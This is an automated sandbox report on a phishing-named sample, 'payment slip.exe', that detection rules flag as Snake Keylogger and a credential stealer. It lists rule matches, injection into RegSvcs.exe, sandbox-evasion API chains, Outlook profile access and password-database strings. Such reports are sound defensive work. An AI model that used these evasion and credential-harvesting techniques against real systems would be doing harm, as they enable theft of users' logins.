                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@4/4
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A37B5 GetLastError,FormatMessageW,0_2_000A37B5
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000910BF AdjustTokenPrivileges,CloseHandle,0_2_000910BF
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000916C3
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_000A51CD
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_000BA67C
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_000A648E
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000342A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\payment slip.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut72B7.tmpJump to behavior
                  Source: payment slip.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\payment slip.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.00000000027D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.00000000027C7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002783000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: payment slip.exeReversingLabs: Detection: 23%
                  Source: payment slip.exeVirustotal: Detection: 22%
                  Source: unknownProcess created: C:\Users\user\Desktop\payment slip.exe "C:\Users\user\Desktop\payment slip.exe"
                  Source: C:\Users\user\Desktop\payment slip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\payment slip.exe"
                  Source: C:\Users\user\Desktop\payment slip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\payment slip.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: payment slip.exeStatic file information: File size 1065472 > 1048576
                  Source: payment slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: payment slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: payment slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: payment slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: payment slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: payment slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: payment slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: payment slip.exe, 00000000.00000003.1381560458.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, payment slip.exe, 00000000.00000003.1387805550.0000000003D50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: payment slip.exe, 00000000.00000003.1381560458.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, payment slip.exe, 00000000.00000003.1387805550.0000000003D50000.00000004.00001000.00020000.00000000.sdmp
                  Source: payment slip.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: payment slip.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: payment slip.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: payment slip.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: payment slip.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00050A76 push ecx; ret 0_2_00050A89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F486FD push ecx; ret 2_2_05F486FF
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0004F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0004F98E
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_000C1C41
                  Source: C:\Users\user\Desktop\payment slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found API chain indicative of sandbox detection
                  Source: C:\Users\user\Desktop\payment slip.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98126
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\payment slip.exeAPI/Special instruction interceptor: Address: 3B03234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594082Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1833Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7983Jump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeAPI coverage: 3.8 %
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0009DBBE
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0006C2A2 FindFirstFileExW,0_2_0006C2A2
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A68EE FindFirstFileW,FindClose,0_2_000A68EE
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_000A698F
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D076
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D3A9
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A9642
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A979D
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_000A9B2B
